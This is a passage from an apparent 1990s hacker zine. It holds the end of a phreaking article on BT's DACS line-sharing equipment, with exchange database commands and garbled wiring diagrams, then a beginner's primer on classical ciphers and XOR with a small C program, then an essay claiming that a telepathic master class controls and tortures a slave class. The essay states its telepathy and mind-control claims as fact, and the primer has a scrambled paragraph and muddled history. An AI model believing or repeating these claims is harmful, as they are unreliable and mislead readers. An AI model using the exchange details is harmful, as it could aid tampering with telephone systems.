multiplexed into 2 serperate carriers, the bandwith will be cut in half. To this date, BT are encouraging its customers to join the 'BT SuperHighway' by installing a second line.. What BT don't tell you is that you will only be able to get a maximum of 28.8bps from your 'second' line. In this file, I'll look into the DACS carrier system in detail, aswell as ways to determine what kind of trunk installation you have if you have ordered a second line from BT. Werd, enjoy the file.. DACS II The origional DACS system had limited capabilitys, and did not allow the customer to have CLASS services on their line. The newer DACS implementation is called DACS II and allows a slightly more advanced service to customers. Now people with DACSII units on their line, have access to CLASS (Customer Loop Access Signalling System). The new DACS hardware, allows customers lines to have K Break (Disconnect Clear), aswell as common services such as CLI, which where previously unavailable to DACS I customers. At the eXchange All exchanges have a database of different customers who have been fitted with the DACS equipment. Some of the commands used on the CSS database at the local terminating exchange are as follows: <DFTR> DISPLAY FRAME TERMINATION RANGE (to see if DACS equipment is fitted to the exchange) <DFJ> DISPLAY FRAME JUMPER (to determine whether a particular customer is using DACS1 or DACS2) Remote End eXchange records The Local Network Records (CSS/LNR) are modified/editited as follows on the O/S at the exchange: <ESU> <MSU> <DRT> <HEH> ENTER SHARED USE MODIFY SHARED USE DISPLAY ROUTING INVALID COMMAND

Compatability of DACS: GOOD.. The provision of PSTN services when used with only BABT - approved Customer Premises Equipment upto 4 REN. Use of any phone exchange within BT's access network, except the

following: Inter working with all BT's remote line test systems Self contained payphones Lines utilising CLASS K Break All modems up to 14.4bit/S working Group 1,2,3 fax machines Video phones BAD.. Earth calling PBX's Equipment that uses SPM (meter pulsed payphones) Private Services ISDN2 Steel joint user poles Certain TXE2 exchanges 300 kilohms loop calling Electricity stations DDI Group 4 fax machines DACS system schematics, diagrams.. Old Jumpering Procedure E L : : _____________ : : _____________ | | : : | | | O-:-----. .-:--O | exchange | O-:---. | | : | | external <------------O sub number | : | | | : | bar pairO------------> | | : | | | : | | cable | | : | | | : | | |_____________| : | | | : |_____________| : | | | : : | | | : : | | | : _____________ : | | | : | | : | | | : | DACS block | : | | | : | | DACS shelf : | | | : |O------------> : | | | : | | : | | | : | T B1 B2 | : | | | : |_____________| : | | | : o o o | | |_______| | | | |________________| | |_______________________|

New Jumpering Procedure

E L : : _____________ : : _____________ | | : : | | | | : : | DACS B1 B2 | exchange | | : : | | DACS shelf <------------O sub number | : : |O------------> | O---:----------:---|--O B2 | | O---:----------:---|--O B1 | |_____________| : : |_____________| : : : : : : _____________ : : _____________ | | : : | | | DACS trunk | : : | | DACS shelf | | : : | | external <------------O | : : | bar pairO------------> | CH2 | : : | | cable | CH1 O--O---:----------:---O | |_____________| : : |_____________| : : : : E.U Card Setup _________________________________________ .--------. | (O) (O) (O) | | | | | | | | | | | | on | | | 1 | | | | | | | | | off | 8 | | |_____(O)_(O)_____________(O)_(O)_(O)_____| | | | | | | <-- B.E.R connector |________| sw7O9 sw7O3 sw7O6 sw7OO _____ _____ _____ c | | c | | c | | | : | | : | | : | | : | | : | | : | | : | | : | | : | | : | | : | | : | r |_____| r |_____| r |_____| b1 a3 a1

_____ c | | | : | | : | | : | | : | r |_____| b2

.--------. | | | | | | | | | | | | |________|

DACS 2A EU SW 1O1 _____ _____ | | | | | O | | O | | | | | | | | | | | | | (imp) _____ | | | O | | | | | | | _____ | | cpx | O | 6OO | | | | | | en _____ | | | O | | | | | | | (class) _____ _____ | | | | | O | | O | | | | | | | | | | | | | _____ | | | O | | | | | | |

|_____| |_____| |_____| |_____| 1 1 SW _____ | off | | | | | | | | O | |_____| 1 (alarm) 2 1O2 _____ | | | | | on | | | | O | |_____| 2 3 4 4 _____ | | | O | 1Ok | | | | | | 15k |_____| 2 (sign)

|_____| |_____| |_____| |_____| 1 2 3 4

_____ | | | O | | | | | | | |_____| 1

External RU Setup BT66

white B1 O--------------. blue | | | | | | | | white | B2 O------------. | orange | | | | | | O O white .-------------. | grey | | | | | | | | | | | | | | | | | | | | | O | | tail | trunk O

MIMIC Resistances

switch 5 on (cal) 1k ohm loop _____ | | | _____ |

C S S T E S T A C C E S S

a | | | | a ______ o--------O | switch 5 off (ug) | O------------O | b1 | | 10k ohm -50v leg b2 | | b1 | NTE | o--------O | | O------------O______| b | | | | b | O======================O | | EU O======================O RU | a | | TRUNK | | a ______ o--------O | | O------------O | b2 | | | | b2 | NTE | o--------O | | O------------O______| b | | | | b |_____| |_____| s/c b1 + b2 EU fault 10k ohm -50v a leg b2 TRUNK fault 1k ohm loop b1 or b2 customer apps fault

Welp, thats it for this DACS oday info. Hope someone can find some use of it, HEH. Big shouts to gr1p, b4b0, 9x, substance, psyclone & GBH krew, tip, jorge, lusta, pbxphreak, bodie, zomba, jasun, oclet, knight, epoc, nou, everyone in #darkcyde, #b4b0, #9x HEH, werd to D4RKCYDE.. 2 years going str0ng. "that ascii took me fuckin ages.." the urls.. http://b4b0.org http://darkcyde.phunc.com http://www.ninex.com http://hybrid.dtmf.org ATE/>exit +++ NO CARRIER B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.12][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Introduction to Encryption (Volume 1) - Substitution Ciphers - Transposition Ciphers - Simple XOR by: ep1d -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/* Substitution Ciphers */ Substitution cipher is a type of encryption where each character in plaintext is replaced with another character in ciphertext. There are four types of substitution ciphers. - Simple Substitution cipher - Homophonic substitution cipher b4b0 f41th 9x BL4CKM1LK hardcore teleph0n1cs.. (GO NOW!)

- Polygram substitution cipher - Polyalphabetic substitution cipher * Substitution Cipher - Each plaintext character is replaced with a ciphertext character. The famous Caesar Cipher uses the simple substitution cipher. Each plaintext character is replaced by the character three characters over the the right in the alphabet. (Ex: A is replaced with D. B is replaced with E) The Caesar Cipher is even simpler to understand than substitution ciphers withen its self. The reason is the ciphertext is a rotation of the plaintext. A well known program that uses simple substitution is ROT13. It uses a simple way of encrypting data, by rotating the characters as the Caesar Cipher does. The only difference between this cipher and the Caesar Cipher is the cipher used in ROT13 rotates the plaintext character 13 places to get the ciphertext character. (Ex: A is replaced with N. B is replaced by O). In order to change the ciphertext back to the plaintext, you just run it through ROT13 twice. P = ROT13(ROT13(P)) As said before simple substitution ciphers are not intended for security, but it is often used in Usenet posts to hide potentially offensive text, avoid giving away a solution to a puzzle, etc. Simple substitution ciphers are easily broken due to the fact that the cipher does not hude the underlying frequencies of different letters of plaintext. All that is needed to crack a simple substitution cipher is 25 letters of the alphabet. * Homophonic Substitution cipher - plaintext character can be replaced with a string of ciphertext characters. Homophonic Substitution ciphers where used way back in the 1400s. They are much more complicated to break than simple substitution ciphersbut do not obscure the statistical properties of plaintext language. * Polygram Substitution Cipher - Blocks of characters are encrypted in groups. Polygram substitution ciphers are groups of letters encrypted together. A well known cipher known as The Playfair cipher, invented in 1854, used by the British in World War I. It encrypts a pair of letters together. * Polyalphabetic Substitution Cipher - Made up of multiple simple substitution ciphers. Polyalphabetic substituion ciphers were invinted in 1568 by Leon Battista, and where used in the Civil war by the Union army. With the help of computers this type of cipher can be cracked easily, and with this in mind many commercial computer security products use ciphers in this form. The polyalphabetic substitution cipher uses multiple one-letter keys. Each key is used to encrypt one letter of plaintext. The first key encrypts the first letter, the second key encrypts the second letter, etc. Once all of the keys are used the cipher starts at the beginning of the keys. (Ex: In 20 one-letter keys, each 20th letter key is encrypted by the first key.) This is called the period of the cipher. In classical cryptography, ciphers with larger periods are harder to break than ciphers with small periods. Computer techniques can be used easily break substitutions ciphers with large periods. The Vigenere cipher, published in 1586, is an example of Polyalphabetic Substituion.

In the 1920s a mechanical encryption device was invented to automate the process of encrypting data. Most were based on the concept of a rotot, a mechanical wheel wired to perform a general substitution. A roto machine has a keyboard and a series of rotors and uses a version of the Vigenere cipher. each roto has an arbitaray permutation of the alphabet, each has 26 positions, and performs simple substitutions. Example A rotor might be wired to substitute "F" for "A", "U" for "B", "L" for "C," etc. The output pins of one rotor are connected to the input pins of the next. In a 4-rotor machine and the second rotor might substitute "C" Then the some of the different. the first rotor might substitute "F" for "A," might substitute "E" for "Y," and the fourth for "E," thus making "C" the output ciphertext. rotors shift, so the next substitution will be

The combination of several rotors and gears moving them that makes the machine secure. All of the rotors move at different speeds, and the period for an nrotor machine is 26^n. Some rotor machines move at different positions on each rotor, making the encrypted data more secure. The widest known roto machine is known as the Enigma. The Enigma was used by the Germans during WWII. Invented by Arthur Scherbius and Arvid Gerhard Damm in Europe, but patented in the United States by Arthur Scherbius. German Enigma had three(3) rotors, chosen from a set of five(5), a plugboard that permuted the plaintext, a reflecting rotor that caused each rotor to operate on each plaintext letter two times. The Enigma was complicated, but broken by a very good team of Polish cryptographers, and explained their attack to the British. After finding out the Germans modified their Enigma, and the British continued to break the new versions. /* Transposition Ciphers */ There is not much information on Transposition Ciphers. So if I have missed any thing you know regaurding Transposition Ciphers, please send me an email and I will re-release the article with the new content. In a Transposition Cipher the plaintext remains the same but the order of the characters are shuffled around. Simple Columnar Transposition Cipher, plaintext is wrote as if it were wrote on graphpaper. The plaintext is wrote horizontal and is set to a fixed width. The ciphertext is read off vertically. Decryption is a matter of writting the "ciphertext" verically with the known fixed width and reading plaintext off horizontally. Example Plaintext: This is a example of a simple columnar transposition cipher T H I S I S A E X A M P L E O A S I M P L E C O L U M N A R T R A N S P O S I T I O N C I P H E R Ciphertext: TALMLTONR HEEPURSC IXOLMAII SAAENNTP IMSCASIH SPIORPOE

The fixed width in the example is six(6). The letters of the ciphertext and the plaintext are the same, a frequency analysis on the ciphertext would reveal that each letter approximately has the same likelihood as english. Thus being a very good clue to a cryptanalyst who can then use a variety of techniques to get the right ordering of the letters to retrieve the plaintext. Putting the ciphertext through Simple Columnar Transposition Cipher more than once, greatens the security of the encrypted data. There are more complicated transposition ciphers, but with the use of computers they are easily breakable. The German ADFGVX cipher, used during WWI, is a transposition cipher combined with simple substitution cipher. It was a complex algorithim for its day, but a french cryptanalyst, Georges Painvin, broke the cipher. Many modern algorithims use transposition ciphers, but requires a lot of memory and requires messages to only be certain lengths, substitution is far more common. /* Simple XOR */ XOR is an operation 0 0 1 1 a a exclusive-or operation, known as '^' in C. It's a standard on bits: ^ 0 = 0 ^ 1 = 1 ^ 0 = 1 ^ 1 = 0 ^ a = 0 ^ b ^ b = 0

The simple-XOR algorithim is really embarrasing. It is nothing more than a Vigenere polyalphabetic cipher. It is only because of its prevalence in commercial software. It was widely used in most MS-DOS and Macintosh Operating Systems. Although a software security program proclaims that it has "proprietary" encryption algorithm faster than DES the odds are it is some variant of given code. *snip* void main (int argc, char *argv[]) { FILE *fi, *fo; char *cp; int c; if((cp = argv[1]) && *cp != '\0') { if((fi = fopen(argv[2], "rb")) != NULL) { if((fo = fopen(argv[3], "wb")) != NULL) { while ((c = getc(fi)) != EOF) { if(!*cp) cp = argv[1]; c ^= *(cp++); putc(c,fo); } fclose(fo); } fclose(fi); } } } The algorithim takes the plaintext and XORs it with a keyword to generate the ciphertext. To restore the ciphertext to plaintext just XOR it again. Encryption and decryption uses both the same functions and programs. P ^ K = C

C ^ K = P This kind of encryption is trivial to break without computers, but no real security is here. Only a few seconds are needed with a computer. Assuming that the plaintext is English, and Assume the key length is a small number of bytes, here are a few steps to break it: 1> Discover a length of the key, by counting coincidences. XOR the ciphertext against itself shifted various numbers of bytes, and count those bytes that are equal. If displacement is a multiple key lengths, somthing over 6 percent of the bytes will be equal. If it is not less than .4 percent will be equal. (Assuming the key uses ASCII text; other plaintext will have different numbers). This is index of coincidence, smallest displacement indicates a multiple key length is the length of the key. 2> Shift the ciphertext by the length and XOR it with itself. This removes the key and leaves you with plaintext XORed with plaintext shifted the length of the key. Seeing how English has 1.3 bits of real information per byte, redundancy is no matter for determining a unique decryption. Do not be misslead this algorithim is a toy, and should not be considered as anything to keep knowledgable crypanalyst away from encrypted data. This is the algorithim that the NSA allowed the U.S. digital cellular phoe industry use for voice privacy. As noted above, this algorithim may keep your lil brother/sister, and your parents out of your files, but will not stop a cryptanalyst for more than a few minutes. Thus bringin the Introduction to Encryption Volume 1. If there is anything that you can see with this article, that may be considered wrong, or if I left out. Please e-mail me at ep1d@nebula.diginix.net. In the near future I will probbly write more on the articles listed here. ep1d@nebula.diginix.net B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.13][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 CAN PEOPLE READ YOUR MIND? -------------------------Silvio Cesare silvio@big.net.au FOR THE OPPRESSED, COMMUNICATION IS THE BEGINNING OF ABOLITION.

in IRC channel #freedog, efnet network, nick 'silvio' oz.org network (Australia), nick 'silvio' INTRODUCTION This article describes an oppressive society where the social structure is designated by the telepathic abilities of the individuals. The oppressed are coerced into a slave mentality through demoralisation and associated "brainwashing" and mind control techniques. The structure and the implementation of implanting the slave mentality into the oppressed is outlined in this article. The article then continues to describe how an upheaval of this oppression in the social structure may be

achieved or started, by we the oppressed, via global awareness and uniting of our people. THE SLAVE/MASTER SOCIAL STRUCTURE The social structure of society in the current age is determined not only by pure wealth, assets, or where we live. A much more sinister and fundamental classing system is imposed. The structure I am describing is based on the telepathic abilities of the individual. The fundamental structure is a two class slave/master system, as has been the case for many societies for a time-span much greater than one would imagine possible considering the basic in-humanity imposed by force-ably dictating the life and future of another human being. The telepathic correlation into the structure is such that the master class can hear the thoughts or the read the minds of the slave class, to whom, can read or hear no-ones thoughts and minds. The actual telepathic abilities are not quite as course as this in society, with a group that can read the minds of the slave class, but can also remotely physically and subconsciously affect them. Almost certainly another group exists, or may be in-fact part of the previous group, where an individual can both hear and be heard by the master class. This also presents a situation where the individuals in the slave class are unaware of the existence of others and are unable to, with total certainty determine that another individual is in a similar predicament, much analogous to not being able to determine others having the ability to think - though it is common knowledge that we all do. IMPLEMENTING OPPRESSION AND THE SLAVE MENTALITY The group who has the ability to telepathically read the minds of a group could have used this extraordinary ability (or equally an extraordinary ability of the group who's mind can be read) and cooperated resulting in a net benefit for society in its entirety. However, as is true in many historical times, the group with a position where they can dominate another group, force-ably implements that dominance, and this exact thing has occurred in the slave/master telepathically determined social structure of current. PROPAGANDA AND MANIPULATION AS A TOOL FOR OPPRESSION It is a scientific fact, that "brainwashing" techniques and propaganda based information can be an effective tool in the implementation of a new ideology for a person. Much of this is based on relating to a person at an emotional level. For example, much of Nazi propaganda was based around the fact that the minority groups they opposed were to be considered as sub or non human. They did this through emotionally manipulating the people into a mental state of total repugnance for the oppressed. Likewise, in slave history, slaves were seen as being born a slave and were thought to be inherently destined to be subservient. Thus propaganda based distribution of information was used to promote that it was a genetic not environmental reason that a slave was a slave and a master was a master. This naturally was not supported or verified by open scientific discussion that would refute such blatantly biased and prejudiced claims. This however is a key point, that a slave/master structure is not a scientific based structure, it is an emotionally based structure. It may be intellectualized and rationalized to have economic correlations, however, this is as a result of the emotional thinking, not rational thinking. Intellectualization is often used to identify with a persons cognitive thoughts, however, such ideas are based on rationalizations. For example,

"q: why is he a slave? a: because he was born a slave." "q: why was he born a slave? a: black people aren't like normal people" "q: why aren't they like normal people? a: look at them, their slaves." This gives also an example of "blame the victim syndrome", which was also a driving force for the Nazi's and general slavery, as this was a common emotional feeling held by the population. For oppression, the form of demoralisation follows similar lines to emotionally based ideology implanting. It is not based on scientific fact, but is based purely on psychological and physiological responses that the oppressed individuals intellect cannot always compete with. Thus, even being intellectually aware that you are being demoralized or "brainwashed", does not always enable you to resist indefinitely. However, simple highly effective techniques do exist, and are presented later in this article. DOMINANCE IN THE ENVIRONMENT The environment in which the oppressed lives and dwells plays an essential role to coerce a slave mentality into the individual. The primary focus, is that the environment is totally dominated by the oppressors, and the oppressed are not able to control their own life. Thus their own life is a function of the oppressors. This is not of course true, but it is a natural psychological response to such an extraordinary and certainly unnatural situation. EXCESSIVE STRESS AS A TOOL FOR EMBEDDING A SLAVE MENTALITY The primary aim of the oppressor is to raise the stress of the oppressed to such an extent where the coping mechanisms can no longer function. It is at these times, when mental instability is at its greatest, and the ability to be influenced is equally at its greatest, thus it is times like this when new ideologies are implanted. This stress can be induced and increased until such a time occurs, and such a feat is not difficult in consideration that for all purposes, the entire social population is attempting to induce such a thing in a specific individual. THE "ENDS JUSTIFIES THE MEANS" PHILOSOPHY OF OPPRESSION It must be noted, that, the oppressors are believers of an "ends justifies the means" philosophy, and what a normal individual in a non oppressed population would consider inhumane to even consider, such acts are extremely common and to be expected. From people the individual has a close relation too, to people the individual does not know. The most repugnant things may be experienced, and it must be made immediately clear, that for the oppressors such actions appear justified just as the extermination of the Jews for the Nazi's or the oppression of black people for slavery was justified at the time. DENIAL OF OPEN DISCUSSION AND INFORMATION IN OPPRESSION A primary focus that deeply undermines the ability to remain free of the slave mentality, is the inability to communicate openly. The oppressors will not relate to the oppressed in any form where they are on equal terms, thus possibly relating to the oppressed as a living being and not simply an object. LANGUAGE GAMES AS A MEANS TO DESTROY RATIONAL THOUGHT In a similar respect to lack of open discussion, language games are used to effectively eliminate the ability for rational thought when these games are followed by the individual. In this respect, the effective language of the

oppressed individual is replaced with a metaphoric and quite simply mostly nonsensical language that is used for communication between the oppressor and the oppressed. This has the startling ability that because the individual no longer has a satisfactory framework of language to use, rational thought, which is much derived from the ability to effectively communicate complex ideas, is not practically possible and also serves to derive new psychologically damaging associations. It should be stated that coloqially, the oppressed here, are known to as "dogs", though the term "cat" is given to an oppressed individual to use on occasion. Naturally, the most fundamental words in language in regard to their functional status in society are replaced metaphorically. Thus the individuals entire conceptualization of society may change by replacing specific keywords in the language used. CULTIC STRATEGIES OF IMPLEMENTING SUBSERVIENCE A premeditated cult like induction of the slave mentality is used early on in the ideology implanting and used sparsely following. In these circumstances, many of the persons fundamental beliefs are questioned, with a psychologically coercive attitude using such physiological factors such as lack of sleep, sexual drives, and drug induced conscious states. Likewise, the attempt to force an addiction onto an oppressed individual, and then to remove the source to satisfy the urges of the addiction, to induce a high increase in stress. Psychological factors involve such common raw emotions as fear, anger, frustration, happiness (to enforce that the oppressed is most happiest with the oppressors, or simply for positive re-enforcement of negative traits), and such stress inducers as changes in work, home or even family structure. Many first time events such as coming into awareness of telepathic abilities are under an altered state of consciousness (drug induced). These are times when the ability to be influenced is greatest. At these times, the oppressed individual is often bombarded with a flurry of personal attacks of such things as their sexuality, their race, their beliefs, and are often attacked verbally in such a manner, such that they may fear latter events of violence, wrongful imprisonment or even life threatening situations. Typically, the situation is such that the dominating majority of the influential social group involved is involved in such activity, however, as with this typical this mind control technique, and more classically known as "good cop, bad cop", the oppressed individual given a so called ally outside the immediate social group, however this person is far from an ally, and is indeed actually present to influence and guide the oppressed into the mental and physical states desired by the oppressors. This technique is a strong method used in many forms of demoralisation and "brainwashing" in the aim to elicit a bond between the oppressed and an oppressor or oppressors that can be used to influence and implant beliefs in the individual. This influential bond is a one of the primary tools used for embedding the slave mentality, and it must be again be made apparent, that an "ends justify the means" approach is taken by the oppressors using such structures as the family, sexual relationships, friendship and the individuals own role models, which often includes celebrities or positions of high status deemed in society. INDUCED EUPHORIA AS A TOOL FOR THE OPPRESSOR * The oppressed individual often experiences a period of god like status indicated by the oppressors, seemingly having the ability to influence the masses, and do as one may wish being given full rights for any activity as they desire. It must be understood, that at no times, does the oppressed person ever truly have such freedom. They are heavily guided into activities, and a reward based system as simple as a smile or a frown can often dictate how the individual uses their so called apparent freedom. Likewise, it shows

a contradictory position, that the oppressors will not openly discuss the situation even if repeatedly requested, even in this so called god like stature. This also plays a dual effect of demoralizing the oppressed in a later stage by believing they had abused their so called position of power. It is irrespective, of how they used their position at the time, the oppressors will never acknowledge anything other than actions that can be used to enforce the slave mentality onto the individual. This also serves to re-enforce the idea that the oppressors are actually being oppressed by the soon to be oppressed who are actually strongly coerced psychologically into playing a dominant role over the oppressors who role play as being submissive. However, the converse does not apply, if the oppressed strongly opposes submission of persons irrespective of the apparent desire of those persons to play that role, the oppressors do not change their role. This eventually leads to frustration in the part of the oppressed in their inability to help, which again serves the final purpose of the oppressors, into demoralisation and implanting of the slave mentality. It must be made a point though, that the argument that the oppressed would enslave the oppressors if given the chance or even coerced and such slavery would even be far more in-just, is fictitious fantasy used as propaganda by the oppressors, as this has certainly been not the case. Even if this were true, the oppressed are being coerced by the oppressors into such actions, and they have already no doubt accumulated a great deal of stress form the period of time before becoming aware of the telepathic nature of society. Thus this is propaganda in its purest form, deriving fictitious fact which is highly biased in favour of the oppressors, and only serves to re-enforce the oppressors and never to negate them. REMOTE PHYSICAL STIMULUS OF THE OPPRESSED As mentioned in previous sections, a group in society exists that has telepathic skills that can remotely subconsciously influence, and physically stimulate and influence. Torture or attempted degradation is achieved often through unconsentual sexual stimulation. Be sure, that this is no source of pleasure as it is indeed a tortuous ordeal occasionally involving personal injury in the form of pain for the days to follow from the stimulation involved. Unconsentual sexual acts, or rape, is indeed such an effective tool as it can be noted in direct physical rape in general society causing a high loss of degradation, often involving many psychological responses, of being powerless, shamed and fearful. This is indeed a prime instance of the "ends justify the means" ideology that the oppressors follow. This indeed re-enforces the the oppressed person is never totally safe or free, a large factor in the demoralisation and it is not uncommon such feelings to generate large emotions of frustration. REMOTE INFLUENCE OF THE OPPRESSED In a similar scenario, their is an existence of people who can influence subconsciously the oppressed. This form of influence, while indeed is certainly an advantage to oppression, does not dictate that the oppressed can be heavily influenced using these techniques. Rather, in common practice, such influence is used to induce the oppressed to think or think excessively on a particular topic, and then the physically based demoralisation techniques are used for the embedding of the slave mentality. Thus in itself, its influence is not extreme, and is supported by the facts, the a physical presence is often used in conjunction with such subconscious influence. However, it does serve the oppressors as useful tool for subserviating the oppressed, and its effects are naturally varied depending on the individual involved. CONDITIONING IN THE OPPRESSED

The conditioning process is a almost fanatically used in oppression to indict the response the oppressors are trying to achieve. A punishment system is embedded using common life occurrences such as noise, remote stimulation and non verbal gestures. These stimuli while seemingly very crude are actually very effective, as noted by the classically known "dripping water-tap" torture. Likewise, such punishments while in their own form not always constituting punishment, can be conditioned into the individual at a time when they are of easy influence. More conditions detrimental to human spirit is also aimed for, such as learned helplessness. THE SLAVE MENTALITY The eventual aim of demoralisation and psychological "brainwashing" or conditioning is to elicit a functional person embedded with a slave mentality. Note that having a slave mentality does not necessarily require the oppressed to recognize such a mentality existing within themselves. It may be noted, that perhaps the most perfect slave, is a slave who believes not to be a slave, but working sometimes unknowingly for a master, for their own reasons. Demoralisation is also not always a prerequisite for embedding the slave mentality also, as it is only a tool used to embed such a mental state. Thus it is quite possible for a person to be recognized as being in the slave relationship without experiencing the conditions described. However, the final result is the same, and the quality of life is no better or worse for such a person. The individual is just that, and has their own unique levels of stress tolerance and ability to cope with such conditions. Much as it is analogous to pain, that a person may have a slight cut and be in great pain, and a person who has a fractured bone, feels nothing more than a slight sensation. The key point, is that no-matter what conditions the oppressed individual experienced, their struggle is no greater or easier than others who have been through less. However, it is certainly a case, that once the slave mentally has been embedded, the persons life even if considered reasonable by the individual is no better than the person who lives under extra-ordinarily terrible conditions and represses the situation. Thus it is essential to understand, that quality of life can be greatly raised by upheaval of oppression. Perhaps more importantly though for some, the moral and ethical structure in which we are members of society of is so abomidably warped, that it is a struggle not just for each person to carry through, but something we must struggle for our people and also, for all society in general. Thus the oppressed is embedded with slave mentality. It must be noted however, that demoralisation and torture is not an indefinite affair. The aim of the oppressors is to embed with the slave mentality, yet still be functional in society but at the same time live in fear of the oppressors to maintain their mind-set, with the occasional relapse of torture again for maintanence. This is to be used and abused by the oppressors who embedded the individuals involved. Many people are under the false belief that the oppressors have low expectations of the oppressed in their functionality, and this is where the problem occurs that helps embed the slave mentality. The oppressed believing them-self of low worth in society, strives in achievement which is ultimately guided by the oppressors, and in effect elicits a slaves behaviour for societal self worth. The culmination of those achievements and the rewards associated with them however are not directed at the oppressed, but in-fact, the oppressor, thus the slave mentality is complete without the oppressed realizing. A perfect slave indeed. This changes dramatically the role of the oppressed in resisting oppression. It is a falsehood to the oppressed that they are lower achievers than the oppressors. It is a truth, that the oppressors gain what the oppressed do achieve. This also serves as a basis on why the oppressors do not realize their errors in ideology through an oppressed individuals skills, dedication

and achievement. This in fact describes the slave/master social structure. Naturally, the oppressed slave is given idle rewards, so as to keep the effective achievements at a consistent high standard. It is to be recognized that the slave/master relationship should not be abolished simply by non achievement in the oppressed, but rather through equality for achievement in all. GENETIC RATIONALIZATIONS The slave mentality for most people is so forcibly inscribed into people, that is is considered inbred into the person from their birth. This is fictitiously incorrect, but examples over history do serve as prime examples that this is so dominant in our society. In the course of modern history, it has been witnessed, which at the time was almost incomprehendable to the citizen, that persons of normal caliber and without any inborn deficiency or hidden desire, had been "brainwashed" to such an extent, where their entire ideology of groups they were at war with at the time had been completely reversed, and as they were reintroduced to society, they were opposing views they previously held, finding their previous actions before the point of ideology change utterly shameful. Even more amazing, is the fact, that they had invented completely new and fictitious beliefs that their own organizations had been secretly conspiring against their enemy of the time to do such actions that would make even most of the stern of people shake their head in disbelief. The average person at the time of these events was utterly shocked to hear such a thing was possible, yet it has been happening for thousands of years with the eliciting of a slave mentality in oppressed people. It is only when they themselves, see such actions as possible to their own, do they sometimes begin to identify that such responses are not always inbred. Even this however, does not generally happen. The persons involved in the ideology changes are often thought to be by the public as "not your normal people", thus eliminating the thought that they themselves are not totally infaliable. RESISTANCE TO DEMORALISATION AND "BRAINWASHING" All is not bleak however, other individual who were involved in such a regime of "brainwashing" resisted extremely well. The differing aspects, where these people were part of an organization that was aware of such possibilities, and had trained these persons as best they could (psychology is not an exact science) to be able to actively resist the strong influences of environment change and the alternation between torture and leniency, that is so fundamental to demoralisation and implanting or replacing of beliefs. LIMITED INTERACTION FOR RESISTANCE The primal focus of resistance was that of non involvement with the persons attempting to "brainwash" the individual. It is no time for exercising will power to debate the oppressors are at fault. They will never acknowledged such events and will never regret their actions in any reasonable time-line, as they have been heavily influenced themselves by a large peer and authority group that is always present, to deindividualize the oppressed into objects, so that they are able to be manipulated, deceived, and tortured without any ill harm to the oppressor in physical or mental states. In the specific oppressed environment that we are in, where our foreseeable lifetime is to be involved with the oppressors, this is not always possible in the absolute sense, as some form of interaction is required to function even minimilisticaly within society. However, the theory is sound and can be equally applied as many active resistors are almost certainly proving each day, in that there is no point in interacting on a level where you are speaking on

the benefits of a free society and the down-falls of an oppressed one. Likewise, any inhumane events that occurs should not be dwelled onto such an extent, where you try to show the fallacy in the oppressors ideology. For even undeniable facts that the oppressors are at fault in, interacting at this extent is only reducing your effective resistance. It must be said, that it is very detrimental also, to use the language games that the oppressors have thrust upon the individual. Language is central to a persons thought process and effectively interrupting this process results in an easily influenced person. Likewise, even simply recognizing the problem, and, if not always achievable at the start, eliminating metaphoric language, will yield dramatic results in resistance. THE INDIVIDUALIST APPROACH AS A CONTRADICTION TO THE SLAVE MENTALITY The perfect slave has the undignified attitudes that their own personal wishes are that of their masters or oppressors. The opposite attitude is an ideal situation in which to resist to the influences of oppression as the two are quite incompatible. It has been seen through case studies of people who have undergone situations of an oppressive environment in an effect to elicit a slave mentality, that the people that survived and were most unharmed by their ordeal were those who were "well put together", in that they were not followers of a single unified lifestyle and belief, but were rather people who had their own interests and attitudes, and were not socially bound to a particular instance in which limited their ability to express themselves (conversely however, people who had been seriously onset with beliefs, which they firmly believed most probably from an early childhood, such as joheva witnesses were also most insusceptible to demoralisation). Living your own life is such a simple act, yet many people, not only those in a serious oppressed environment of persecution and slavery, ignore this, and as a result, are effected adversely, most visibly by high stress. REDUCTION OF STRESS TO RESIST BREAKDOWN OF THE NERVOUS SYSTEM The gist of "brainwashing" appears to be the induction of stress to an intolerable level such that the coping mechanisms of the individual can no longer deal with the situation. It is times like this, where the individual is at such a point where there previous beliefs have been, coloqially speaking, wiped clean or washed, and new beliefs or ideologies may be implanted. Thus the resistors aim is to keep stress at a minimum. This task while apparently simple in a non oppressed environment is not so in an oppressed one, but keeping this in-mind, it is possible to resist more effectively, as is the case of the previous arguments where non interacting into a one sided debate will inevitably lead to frustration, a prime breeding ground for on-setting the slave mentality. INFLUENCE IN THE EMOTIONALLY AROUSED It is also relevant, that strong emotional responses are also prime breeding grounds for on-setting the slave mentality, for example, the person who is greatly angered is more susceptible to have beliefs implanted over the person who is calm. Likewise as previously stated, the person who is greatly stressed and is also angered is much more susceptible than a person who was under no stress before entering an equal emotional state. DENIAL OF OPEN DISCUSSION A driving force into the oppression is the denial of information and alternative views that oppose the oppressors. People are often initially

demoralized into believing they are not only the minority, but they are completely unique, isolated and alone. Naturally, the effects of isolation are important to a situation where a slave mentality is to be induced, however, it also serves as a position to disallow the ideas of other oppressed people to compare, construct and conceptualize problems and alternative ideologies. This is also further demonstrated by the lack of the oppressors to openly converse their beliefs in an open manner. In this manner, not only does an individual have an opportunity to debate on an equal level - which would obviously deflate the position of the oppressor, but it also breeds a problem of never being able to verbally voice opinions, thus solidify their basis into reality and as a strong conceptual idea. It would not be so far fetched, for an individual to believe they had simply imagined the basis of their situation, and to easily repress it, as it has never been openly stated. RATIONALIZATION AND CONCEPTUALIZATION The human instinct of curiosity and abstraction of an ideology that solidifies in a conceptual picture of reality, is a driving force in a being. The individual is often led on a fictitious path to quench the persons desire to explain the events of the situation. Religious theologies are often based on this fact, that it is human to ask and desire knowledge on such fundamental questions of origination, and such large events in our life. It was typical of ancient religions to incorporate such unexplained phenomena as fire, the sun and other such essential aspects of life. For the oppressed, this desire is not lessened in any way, and as the 